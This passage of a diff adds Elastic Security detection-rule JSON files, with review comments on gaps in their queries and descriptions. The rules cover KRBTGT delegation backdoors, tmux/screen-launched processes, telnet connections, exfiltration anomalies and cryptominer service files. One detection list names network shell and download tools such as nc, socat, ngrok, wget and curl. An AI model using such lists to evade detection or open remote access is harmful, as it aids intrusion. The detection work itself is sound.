If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Orbit", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "df6f62d9-caab-4b88-affa-044f4395a1e0_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_107.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_107.json new file mode 100644 index 00000000000..7072a15d9f7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_107.json 
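Review bot: The `process.args in (...)` list in the first step of the `sequence` covers only the x86_64 loader paths (`ld-linux-x86-64.so.2` under `/lib`, `/lib64`, `/usr/lib` and `/usr/lib64`), so a copy of the dynamic loader on aarch64 or i386 hosts (`ld-linux-aarch64.so.1`, `ld-linux.so.2`) never starts the sequence. The rule's index pattern `logs-endpoint.events.*` is not architecture-specific, so adding the other glibc loader names to the list would close that gap; the `/etc/ld.so.preload` entry is already path-independent. The `note` text also says the rule matches "modifying the /etc/ld.so.preload file", while the query only matches `cp`/`rsync` invoked with that path as an argument — worth aligning the wording. If this file is an export from the upstream rules repository, as its layout suggests, the change belongs there rather than in the packaged copy.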
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of the msDS-AllowedToDelegateTo attribute to KRBTGT. Attackers can use this technique to maintain persistence to the domain by having the ability to request tickets for the KRBTGT service.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "KRBTGT Delegation Backdoor", + "query": "event.action:modified-user-account and event.code:4738 and\n winlog.event_data.AllowedToDelegateTo:*krbtgt*\n", + "references": [ + "https://skyblue.team/posts/delegate-krbtgt", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AllowedToDelegateTo", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", + "setup": "## Setup\n\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 107 + }, + "id": "e052c845-48d0-4f46-8a13-7d0aba05df82_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_3.json b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_3.json new file mode 100644 index 00000000000..9e12a3aa287 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_3.json 
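Review bot: The match `winlog.event_data.AllowedToDelegateTo:*krbtgt*` is a KQL wildcard, and on a keyword-mapped field that comparison is case-sensitive; `required_fields` records the field's type as `unknown`, so the mapping is not pinned by the rule. Active Directory compares SPN service classes case-insensitively, so a delegation target recorded with different casing would still be a valid KRBTGT delegation but would not match here. If the field is keyword-mapped, adding a second term such as `*KRBTGT*` (or switching to a case-insensitive match) makes the detection robust to casing; if it is analyzed text the point is moot. If this file is an export from the upstream rules repository, the change belongs there rather than in the packaged copy.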
@@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux to execute commands while attempting to evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potentially Suspicious Process Started via tmux or screen", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and \nprocess.parent.name in (\"screen\", \"tmux\") and process.name : (\n \"nmap\", \"nc\", \"ncat\", \"netcat\", \"socat\", \"nc.openbsd\", \"ngrok\", \"ping\", \"java\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"telnet\", \"awk\", \"wget\", \"curl\", \"id\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary 
Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_4.json b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_4.json new file mode 100644 index 00000000000..bd6413aad90 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_4.json 
@@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux to execute commands while attempting to evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potentially Suspicious Process Started via tmux or screen", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.parent.name in (\"screen\", \"tmux\") and process.name : (\n \"nmap\", \"nc\", \"ncat\", \"netcat\", \"socat\", \"nc.openbsd\", \"ngrok\", \"ping\", \"java\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"telnet\", \"awk\", \"wget\", \"curl\", \"id\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary 
Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_206.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_206.json new file mode 100644 index 00000000000..fe3ff14c03b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_206.json 
@@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies when an AWS Route Table has been created.", + "false_positives": [ + "Route Tables may be created by a system or network administrators. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Route Table creation by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. Automated processes that use Terraform may lead to false positives." + ], + "from": "now-60m", + "index": [ + "filebeat-*", + "logs-aws*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Route Table Created", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(CreateRoute or CreateRouteTable) and\nevent.outcome:success\n", + "references": [ + "https://docs.datadoghq.com/security_platform/default_rules/aws-ec2-route-table-modified/", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRoute.html", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRouteTable" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e12c0318-99b1-44f2-830c-3a38a43207ca", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Use Case: Network Security 
Monitoring", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "e12c0318-99b1-44f2-830c-3a38a43207ca_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_107.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_107.json new file mode 100644 index 00000000000..153165f5fce --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_107.json 
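Review bot: `description` says the rule identifies when a Route Table has been created, but `query` also matches `CreateRoute`, i.e. a route added to an existing table, so the documentation understates what fires. Suggest `"description": "Identifies when an AWS Route Table has been created or a route has been added to an existing route table."`. `note` is an empty string and `technique` is an empty array under the Persistence tactic; either fill them (the Datadog reference in `references` already covers the route-table-modified case) or confirm the exporter requires these empty placeholders.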
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses.", + "false_positives": [ + "Telnet can be used for both benign or malicious purposes. Telnet is included by default in some Linux distributions, so its presence is not inherently suspicious. The use of Telnet to manage devices remotely has declined in recent years in favor of more secure protocols such as SSH. Telnet usage by non-automated tools or frameworks may be suspicious." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to External Network via Telnet", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and process.name == \"telnet\" and event.type == \"start\"]\n [network where host.os.type == \"linux\" and process.name == \"telnet\" and not cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\", \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n ]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e19e64ee-130e-4c07-961f-8a339f0b8362", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "e19e64ee-130e-4c07-961f-8a339f0b8362_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_3.json b/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_3.json new file mode 100644 index 00000000000..9507f240745 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_3.json 
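Review bot: The `setup` text says the rule accepts data from Elastic Defend or Auditbeat, but `index` lists only `logs-endpoint.events.*` and `tags` names only `Data Source: Elastic Defend`, so Auditbeat events will never be queried by this rule. Either add the Auditbeat index pattern to `index` with a matching data-source tag, or remove the `### Auditbeat Setup` section from `setup` so operators do not ship Auditbeat data expecting coverage. The `references` entry for the IANA special-purpose registry matches the `cidrmatch` exclusion list in `query`, so that part is consistent.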
@@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels.", + "from": "now-6h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_sent_bytes_destination_geo_country_iso_code", + "name": "Potential Data Exfiltration Activity to an Unusual ISO Code", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "e1db8899-97c1-4851-8993-3a3265353601", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. 
\n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your network data. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "e1db8899-97c1-4851-8993-3a3265353601_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_6.json b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_6.json new file mode 100644 index 00000000000..34b3ea479d8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e2258f48-ba75-4248-951b-7c885edf18c2_6.json 
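Review bot: `description` says the job flags exfiltration to a geo-location "by region name", but `machine_learning_job_id` is `ded_high_sent_bytes_destination_geo_country_iso_code` and `name` says "Unusual ISO Code", so the description documents a different job dimension. Suggest `"description": "A machine learning job has detected data exfiltration to a particular geo-location (by country ISO code). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels."`. The `setup` text and `related_integrations` agree on Elastic Defend and Network Packet Capture as event sources, so only the description needs the fix.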
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Mining Process Creation Event", + "query": "file where host.os.type == \"linux\" and event.type == \"creation\" and event.action : (\"creation\", \"file_create_event\") and \nfile.name : (\"aliyun.service\", \"moneroocean_miner.service\", \"c3pool_miner.service\", \"pnsd.service\", \"apache4.service\", \"pastebin.service\", \"xvf.service\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e2258f48-ba75-4248-951b-7c885edf18c2", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "e2258f48-ba75-4248-951b-7c885edf18c2_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_112.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_112.json new file mode 100644 index 00000000000..75905987429 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_112.json 
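Review bot: `name` ("Suspicious Mining Process Creation Event") and `description` ("service creation events") describe process or service creation, but `query` is a `file where ... event.type == "creation"` clause matching `file.name` values, so what is actually detected is the creation of a file named after a known miner service. Suggest `"name": "Suspicious Mining Service File Creation"` and `"description": "Identifies creation of files named after common mining services, possibly indicating the infection of a system with a cryptominer."`. The T1059.004 Unix Shell mapping also reads oddly for a file event; T1543.002 Systemd Service may be closer if the intent is service-based persistence, and a `false_positives` entry would help since the rule is missing one.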
@@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of Reflection.Assembly to load PEs and DLLs in memory in PowerShell scripts. Attackers use this method to load executables and DLLs without writing to the disk, bypassing security solutions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious .NET Reflection via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
